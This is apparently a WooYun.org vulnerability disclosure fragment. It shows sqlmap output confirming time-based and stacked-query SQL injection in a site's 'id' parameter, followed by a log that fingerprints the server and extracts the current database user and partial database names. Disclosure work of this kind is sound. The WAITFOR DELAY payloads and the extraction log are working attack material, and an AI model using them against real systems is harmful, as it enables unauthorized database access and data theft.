WooYun.org

Place: GET
Parameter: id
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=120100'; WAITFOR DELAY '0:0:5';-- AND 'lkGY'='lkGY
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=120100' WAITFOR DELAY '0:0:5'-- AND 'wbjf'='wbjf
---
[15:02:02] [INFO] testing MySQL
[15:02:02] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[15:02:04] [WARNING] the back-end DBMS is not MySQL
[15:02:04] [INFO] testing Oracle
[15:02:05] [WARNING] the back-end DBMS is not Oracle
[15:02:05] [INFO] testing PostgreSQL
[15:02:07] [WARNING] the back-end DBMS is not PostgreSQL
[15:02:07] [INFO] testing Microsoft SQL Server
[15:02:13] [INFO] confirming Microsoft SQL Server
[15:02:24] [INFO] adjusting time delay to 4 seconds due to good response times
[15:02:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[15:02:29] [INFO] fetching current user
[15:02:29] [INFO] retrieved: userjxrc
current user:    'userjxrc'

[15:12:22] [INFO] adjusting time delay to 4 seconds due to good re
13
[15:12:27] [INFO] retrieved:
[15:12:55] [ERROR] invalid character detected. retrying..
[15:12:55] [WARNING] increasing time delay to 5 seconds
adsys
[15:14:55] [INFO] retrieved: di
[15:16:14] [ERROR] invalid character detected. retrying..
[15:16:14] [WARNING] increasing time delay to 6 seconds
st
[15:18:49] [ERROR] invalid character detected. retrying..
[15:18:49] [WARNING] increasing time delay to 7 seconds
er
[15:19:49] [INFO] retrieved:
[15:20:53] [ERROR] invalid character detected. retrying..
[15:20:53] [WARNING] increasing time delay to 8 seconds
[15:23:13] [ERROR] invalid character detected. retrying..
[15:23:13] [WARNING] increasing time delay to 9 seconds
mo